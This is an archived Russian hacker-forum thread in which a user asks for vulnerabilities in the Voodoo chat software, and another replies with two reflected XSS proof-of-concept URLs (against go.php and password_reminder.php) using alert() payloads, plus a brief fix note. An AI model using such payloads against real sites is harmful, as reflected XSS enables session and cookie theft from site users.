PDA

Просмотр полной версии : Voodoo chat


_kREveDKo_
07.01.2006, 00:41
FuckinG Voodoo Chat!!!!!!

Не могу его найти ни на лентах багтрака, ни кого ни спрашиваю - не знают... Сам просидел х*й знает сколько, копаясь в нём и выискивая хоть ЧаВо-НиБуДь.... но уж так за***лся, что.... кароче сил больше нет! Может у кого-нить есть какая-нить сек-инфа по нему? Буду оч благодарен.

NaX[no]rT
07.01.2006, 02:55
Поищи, данная тема уже поднималась и не раз. На главной странице есть ПОИСК

NeMiNeM
07.01.2006, 03:02
Есть пассивная хсс:

Type:[XSS] Product: Voodoo chat Author:qBiN exploit: http://victim.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность с помощью сокетов. ------------------------------
Type:[XSS] Product: Voodoo chat Author:qBiN exploit: хттп://сите/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E

вот смотри ету тему:
http://forum.antichat.ru/thread11144.html

Electro
07.01.2006, 14:01
хых больное место )